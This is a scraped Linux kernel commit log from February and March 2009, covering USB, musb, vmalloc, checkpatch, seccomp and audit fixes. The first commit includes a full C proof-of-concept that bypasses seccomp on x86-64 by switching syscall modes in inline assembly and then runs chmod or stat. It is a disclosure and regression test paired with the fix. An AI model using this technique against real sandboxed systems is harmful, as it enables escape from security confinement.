- Mar 03, 2009
-
-
Roland McGrath authoredOn x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by:
Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Roland McGrath authored
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases, audit_syscall_entry() will use the wrong system call number table and the wrong system call argument registers. This could be used to circumvent a syscall audit configuration that filters based on the syscall numbers or argument details. Signed-off-by:
Roland McGrath <roland@redhat.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-
- Feb 28, 2009
-
-
git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/staging-2.6Linus Torvalds authored
* git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/staging-2.6: Staging: w35und: fix usb_control_msg() error handling in wb35_probe() Staging: w35und: fix registration with wlan stack Staging: panel: fix oops on panel_cleanup_module Staging: rtl8187se: Fix oops and memory poison caused by builtin ieee80211. Staging: rtl8187se: fix Kconfig dependencies
-
git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/usb-2.6Linus Torvalds authored
* git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/usb-2.6: (21 commits) USB: musb: fix srp sysfs entry deletion USB: musb: resume suspended root hub on disconnect USB: musb: use right poll limit for low speed devices USB: musb: be careful with 64K+ transfer lengths, host side USB: musb: fix data toggle saving with shared FIFO USB: musb: host endpoint_disable() oops fixes USB: musb: fix urb_dequeue() method USB: musb: fix musb_host_tx() for shared endpoint FIFO USB: musb: be careful with 64K+ transfer lengths (gadget side) usb: musb: make Davinci *work* in mainline USB: usb_get_string should check the descriptor type USB: gadget: fix build error in omap_apollon_2420_defconfig USB: g_file_storage: automatically disable stalls under Atmel USB: usb-storage: add IGNORE_RESIDUE flag for Genesys Logic adapters USB: Quirk for Hummingbird huc56s / Conexant ACM modem USB: serial: add support for second revision of Ericsson F3507G WWAN card USB: cdc-acm: add usb id for motomagx phones USB: option: add BenQ 3g modem information usb: gadget: obex: select correct ep descriptors USB: EHCI: slow down ITD reuse ...
-
git://ftp.linux-mips.org/pub/scm/upstream-linusLinus Torvalds authored
* 'upstream' of git://ftp.linux-mips.org/pub/scm/upstream-linus: Revert "MIPS: Print irq handler description" MIPS: CVE-2009-0029: Enable syscall wrappers. MIPS: Alchemy: In plat_time_init() t reaches -1, tested: 0 MIPS: Only allow Cavium OCTEON to be configured for boards that support it
-
Linus Torvalds authored
Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: x86: enable DMAR by default xen: disable interrupts early, as start_kernel expects gpu/drm, x86, PAT: io_mapping_create_wc and resource_size_t gpu/drm, x86, PAT: Handle io_mapping_create_wc() errors in a clean way x86, Voyager: fix compile by lifting the degeneracy of phys_cpu_present_map x86, doc: fix references to Documentation/x86/i386/boot.txt
-
git://git.kernel.org/pub/scm/linux/kernel/git/lethal/sh-2.6Linus Torvalds authored
* 'sh/for-2.6.29' of git://git.kernel.org/pub/scm/linux/kernel/git/lethal/sh-2.6: sh: ap325rxa: Revert ov772x support. serial: sh-sci: fix overrun error handling for SH7785 SCIF. sh: Storage class should be before const qualifier
-
git://git.kernel.org/pub/scm/linux/kernel/git/mchehab/linux-2.6Linus Torvalds authored
* 'for_linus' of git://git.kernel.org/pub/scm/linux/kernel/git/mchehab/linux-2.6: V4L/DVB (10696): Remove outdated README for the flexcop-driver V4L/DVB (10695): Update Technisat card documentation V4L/DVB (10694): [PATCH] software IRQ watchdog for Flexcop B2C2 DVB PCI cards V4L/DVB (10663): soc-camera: fix S_CROP breakage on PXA and SuperH V4L/DVB (10659): em28xx: register device to soundcard for sysfs
-
Christoph Hellwig authored
Commit 8e961870 removed the FREEZE/THAW handling in xfs_compat_ioctl but never added any compat handler back, so now any freeze/thaw request from a 32-bit binary ond 64-bit userspace will fail. As these ioctls are 32/64-bit compatible two simple COMPATIBLE_IOCTL entries in fs/compat_ioctl.c will do the job. Signed-off-by:
Christoph Hellwig <hch@lst.de>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
David Altobelli authored
Future iLO devices will have an HP vendor id. Signed-off-by:
David Altobelli <david.altobelli@hp.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Andy Whitcroft authored
Signed-off-by:
Andy Whitcroft <apw@canonical.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Andy Whitcroft authored
Add __ref as a sparse modifier. Signed-off-by:
Andy Whitcroft <apw@canonical.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Andy Whitcroft authored
We should allow testing of all modifiers not just attributes. Extend testing and test for all the know modifiers. Signed-off-by:
Andy Whitcroft <apw@canonical.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Andy Whitcroft authored
We must make sure we do not misrecognise a modifier as an Identifier when trying to match types. Prevent us matching this: void * __ref Signed-off-by:
Andy Whitcroft <apw@canonical.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Andy Whitcroft authored
We may have any modifier following a pointer type star. Handle this: void * __user * __user foo; Signed-off-by:
Andy Whitcroft <apw@canonical.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Andy Whitcroft authored
We need to handle interspersed modifiers in the middle of pointer types, for example: void * __user * __user bar; Signed-off-by:
Andy Whitcroft <apw@canonical.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Andy Whitcroft authored
We are triggering the -p0 check for our own diffs generated using --file command line option. Suppress this check for files. Signed-off-by:
Andy Whitcroft <apw@canonical.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Andy Whitcroft authored
We say that in_atomic() is ok in the core kernel, but then always report it regardless of where in the kernel it is. Keep quiet if it is used in kernel/*. Signed-off-by:
Andy Whitcroft <apw@canonical.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Vegard Nossum authored
I just got this new warning from kmemcheck: WARNING: kmemcheck: Caught 32-bit read from freed memory (c7806a60) a06a80c7ecde70c1a04080c700000000a06709c1000000000000000000000000 f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f ^ Pid: 0, comm: swapper Not tainted (2.6.29-rc4 #230) EIP: 0060:[<c1096df7>] EFLAGS: 00000286 CPU: 0 EIP is at __purge_vmap_area_lazy+0x117/0x140 EAX: 00070f43 EBX: c7806a40 ECX: c1677080 EDX: 00027b66 ESI: 00002001 EDI: c170df0c EBP: c170df00 ESP: c178830c DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 CR0: 80050033 CR2: c7806b14 CR3: 01775000 CR4: 00000690 DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 DR6: 00004000 DR7: 00000000 [<c1096f3e>] free_unmap_vmap_area_noflush+0x6e/0x70 [<c1096f6a>] remove_vm_area+0x2a/0x70 [<c1097025>] __vunmap+0x45/0xe0 [<c10970de>] vunmap+0x1e/0x30 [<c1008ba5>] text_poke+0x95/0x150 [<c1008ca9>] alternatives_smp_unlock+0x49/0x60 [<c171ef47>] alternative_instructions+0x11b/0x124 [<c171f991>] check_bugs+0xbd/0xdc [<c17148c5>] start_kernel+0x2ed/0x360 [<c171409e>] __init_begin+0x9e/0xa9 [<ffffffff>] 0xffffffff It happened here: $ addr2line -e vmlinux -i c1096df7 mm/vmalloc.c:540 Code: list_for_each_entry(va, &valist, purge_list) __free_vmap_area(va); It's this instruction: mov 0x20(%ebx),%edx Which corresponds to a dereference of va->purge_list.next: (gdb) p ((struct vmap_area *) 0)->purge_list.next Cannot access memory at address 0x20 It seems that we should use "safe" list traversal here, as the element is freed inside the loop. Please verify that this is the right fix. Acked-by:Nick Piggin <npiggin@suse.de>
Signed-off-by: Vegard Nossum <vegard.nossum@gmail.com>
Cc: Pekka Enberg <penberg@cs.helsinki.fi>
Cc: Ingo Molnar <mingo@elte.hu>
Cc: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>
Cc: <stable@kernel.org> [2.6.28.x]
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Nick Piggin authored
The new vmap allocator can wrap the address and get confused in the case of large allocations or VMALLOC_END near the end of address space. Problem reported by Christoph Hellwig on a 32-bit XFS workload. Signed-off-by:
Nick Piggin <npiggin@suse.de>
Reported-by: Christoph Hellwig <hch@lst.de>
Cc: <stable@kernel.org> [2.6.28.x]
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
David Howells authored
free_uid() and free_user_ns() are corecursive when CONFIG_USER_SCHED=n, but free_user_ns() is called from free_uid() by way of uid_hash_remove(), which requires uidhash_lock to be held. free_user_ns() then calls free_uid() to complete the destruction. Fix this by deferring the destruction of the user_namespace. Signed-off-by:
David Howells <dhowells@redhat.com>
Acked-by: Serge Hallyn <serue@us.ibm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Herton Ronaldo Krzesinski authored
Signed-off-by:
Herton Ronaldo Krzesinski <herton@mandriva.com.br>
Acked-by: Evgeniy Polyakov <zbr@ioremap.net>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Benny Halevy authored
Commit 4ea3ada2 declares d_obtain_alias() as EXPORT_SYMBOL_GPL where it's supposed to replace d_alloc_anon which was previously declared as EXPORT_SYMBOL and thus available to any loadable module. This patch reverts that. Signed-off-by:
Benny Halevy <bhalevy@panasas.com>
Acked-by: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Christoph Hellwig <hch@infradead.org>
Cc: "J. Bruce Fields" <bfields@fieldses.org>
Cc: Trond Myklebust <trond.myklebust@fys.uio.no>
Acked-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Ben Gardner authored
The w1_ds2433 driver does not read from the hardware if the CRC was valid on the last read. The validcrc flag should be cleared after a write so that the new value can be read. Signed-off-by:
Ben Gardner <gardner.ben@gmail.com>
Signed-off-by: Evgeniy Polyakov <johnpol@2ka.mipt.ru>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> -
Vikram Pandita authored
The SRP sysfs attribute is dependent on gadget mode; any gadget may support SRP. But "rmmod musb_hdrc" didn't remove that attribute; fix. Signed-off-by:
Vikram Pandita <vikram.pandita@ti.com>
Acked-by: Felipe Balbi <me@felipebalbi.com>
Signed-off-by: David Brownell <dbrownell@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Anand Gadiyar authored
If this is not done, khubd will not be informed of the disconnect and will assume the device is still there. Easily seen when a hub is connected with no device attached to it; it will autosuspend. When the hub is disconnected, it still shows up in /proc/bus/usb/devices Signed-off-by:
Anand Gadiyar <gadiyar@ti.com>
Acked-by: Felipe Balbi <felipe.balbi@nokia.com>
Signed-off-by: David Brownell <dbrownell@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Sergei Shtylyov authored
Remove wrongly applied upper limit on the interrupt transfer interval for low speed devices (not much of an error per se, according to USB specs). Signed-off-by:
Sergei Shtylyov <sshtylyov@ru.mvista.com>
Signed-off-by: David Brownell <dbrownell@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Sergei Shtylyov authored
Feeding 32-bit length cast down to 'u16' to min() to calculate the FIFO count in musb_host_tx() risks sending a short packet prematurely for transfer sizes over 64 KB. Similarly, although data transfer size shouldn't exceed 65535 bytes for the control endpoint, making musb_h_ep0_continue() more robust WRT URBs with possibly oversized buffer will not hurt either... Signed-off-by:
Sergei Shtylyov <sshtylyov@ru.mvista.com>
Signed-off-by: David Brownell <dbrownell@users.sourceforge.net>
Cc: Felipe Balbi <felipe.balbi@nokia.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Sergei Shtylyov authored
For some strange reason the host side musb_giveback() decides that it's always got an IN transfer when the hardware endpoint is using a shared FIFO. This causes musb_save_toggle() to read the toggle state from the RXCSR register instead of TXCSR, and may also cause unneeded reloading of RX endpoint registers. Signed-off-by:
Sergei Shtylyov <sshtylyov@ru.mvista.com>
Signed-off-by: David Brownell <dbrownell@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Sergei Shtylyov authored
The musb_h_disable() routine can oops in some cases: - It's not safe to read hep->hcpriv outside musb->lock, since it gets changed on completion IRQ paths. - The list iterators aren't safe to use in that way; just remove the first element while !list_empty(), so deletions on other code paths can't make trouble. We need two "scrub the list" loops because only one branch should touch hardware and advance the schedule. [ dbrownell@users.sourceforge.net: massively simplify patch description; add key points as code comments ] Signed-off-by:
Sergei Shtylyov <sshtylyov@ru.mvista.com>
Signed-off-by: David Brownell <dbrownell@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Sergei Shtylyov authored
The urb_dequeue() method forgets to unlink 'struct musb_qh' from the control or bulk schedules when the URB being cancelled is the only one queued to its endpoint. That will cause musb_advance_schedule() to block once it reaches 'struct musb_qh' with now empty URB list, so URBs queued for other endpoints after the one being dequeued will not be served. Fix by unlinking the QH from the list except when it's already being handled (typically by musb_giveback). Since a QH with an empty URB list is now supposed to be freed, do that. And remove a now-useless check from musb_advance_schedule(). [ dbrownell@users.sourceforge.net: update patch description, and fold in a dequeue() comment patch ] Signed-off-by:
Sergei Shtylyov <sshtylyov@ru.mvista.com>
Signed-off-by: David Brownell <dbrownell@users.sourceforge.net>
Cc: Felipe Balbi <felipe.balbi@nokia.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Dmitry Krivoschekov authored
The input queue should be used for TX on endpoints which share FIFO hardware. The host TX path wasn't doing that. Shared FIFOs are most often configured for periodic endpoints, which are mostly used for RX/IN transfers ... that's probably how this bug managed to linger for a long time. [ dbrownell@users.sourceforge.net: update patch description ] Signed-off-by:
Dmitry Krivoschekov <dkrivoschekov@ru.mvista.com>
Signed-off-by: Sergei Shtylyov <sshtylyov@ru.mvista.com>
Acked-by: David Brownell <dbrownell@users.sourceforge.net>
Cc: Felipe Balbi <felipe.balbi@nokia.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Felipe Balbi authored
request->actual is an unsigned and we should use the same variable type for fifo_count otherwise we might lose some data if request->length >= 64kbytes. [ dbrownell@users.sourceforge.net: fix compiler warning ] Signed-off-by:
Felipe Balbi <felipe.balbi@nokia.com>
Signed-off-by: David Brownell <dbrownell@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
David Brownell authored
Now that the musb build fixes for DaVinci got merged (RC3?), kick in the other bits needed to get it finally *working* in mainline: - Use clk_enable()/clk_disable() ... the "always enable USB clocks" code this originally relied on has since been removed. - Initialize the USB device only after the relevant I2C GPIOs are available, so the host side can properly enable VBUS. - Tweak init sequencing to cope with mainline's relatively late init of the I2C system bus for power switches, transceivers, and so on. Sanity tested on DM6664 EVM for host and peripheral modes; that system won't boot with CONFIG_PM enabled, so OTG can't yet be tested. Also verified on OMAP3. (Unrelated: correct the MODULE_PARM_DESC spelling of musb_debug.) Signed-off-by:
David Brownell <dbrownell@users.sourceforge.net>
Cc: Felipe Balbi <me@felipebalbi.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Alan Stern authored
This patch (as1218) fixes a problem with a radio-control joystick used in the "walkera 4#3" helicopter. This device responds to the initial Get-String-Descriptor request for string 0 (which is really the list of supported languages) by sending its config descriptor! The usb_get_string() routine needs to check whether it got the right type of descriptor. Oddly enough, this sort of check is already present in usb_get_descriptor(). The patch changes the error code from -EPROTO to -ENODATA, because -EPROTO shows up in so many other contexts to indicate a hardware failure rather than a firmware error. Signed-off-by:
Alan Stern <stern@rowland.harvard.edu>
Tested-by: Guillermo Jarabo <williamjap@gmail.com>
Cc: stable <stable@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
=================================================================== -
David Brownell authored
In apollon case, it only used udc, so udc configuration should select USB_OTG_UTILS also. Signed-off-by:
Kyungmin Park <kyungmin.park@samsung.com>
Acked-by: David Brownell <dbrownell@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Alan Stern authored
This patch (as1220) automatically disables stalls when g_file_storage finds itself running with an Atmel device controller, because the Atmel hardware/driver isn't capable of halting bulk endpoints correctly. Reported-by:
Stanislaw Gruszka <stf_xl@wp.pl>
Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Acked-by: David Brownell <dbrownell@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Alan Stern authored
This patch (as1219) adds the IGNORE_RESIDUE flag to the unusual_devs entries for Genesys Logic's USB-IDE adapter. Although this device usually gets the residue correct, there is one command crucial to the operation of CD and DVD drives which it messes up. Tested-by:
Mike Lampard <mike@mtgambier.net>
Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Cc: stable <stable@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Adam Richter authored
Signed-off-by:
Adam J. Richter <adam_richter2004@yahoo.com>
Cc: Oliver Neukum <oliver@neukum.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> -
Patrik Kullman authored
I noticed that my revision of the F3507G WWAN card isn't listed in drivers/usb/serial/option.c Signed-off-by:
Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
-